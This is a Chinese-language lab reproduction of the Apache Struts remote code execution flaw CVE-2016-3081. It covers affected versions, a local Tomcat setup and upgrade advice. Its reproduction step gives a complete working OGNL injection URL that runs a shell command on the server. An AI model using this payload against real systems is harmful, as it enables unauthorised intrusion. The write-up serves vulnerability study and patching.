影响版本

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28

漏洞概述

远程用户可以向已启用动态方法调用以在目标系统上执行任意代码的目标服务器提供包含“method:”前缀的巧尽心思构建的表达式

环境搭建

下载地址

http://archive.apache.org/dist/struts/2.3.20/

这里下载的是struts-2.3.20-apps.zip

解压后将文件struts2-showcase.war拷贝到tomcat目录下webapps

start.sh启动

访问http://127.0.0.1:8080/struts2-showcase/home.action即可看到页面

漏洞复现

访问

http://127.0.0.1:8080/struts2-showcase/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

成功执行命令

修复建议

升级到安全版本

升级下载地址：

https://struts.apache.org/download.cgi#struts23281

最后

以上就是朴实大白为你收集整理的Apache Struts 远程代码执行漏洞(CVE-2016-3081)复现影响版本漏洞概述环境搭建漏洞复现修复建议的全部内容，希望文章能够帮你解决Apache Struts 远程代码执行漏洞(CVE-2016-3081)复现影响版本漏洞概述环境搭建漏洞复现修复建议所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。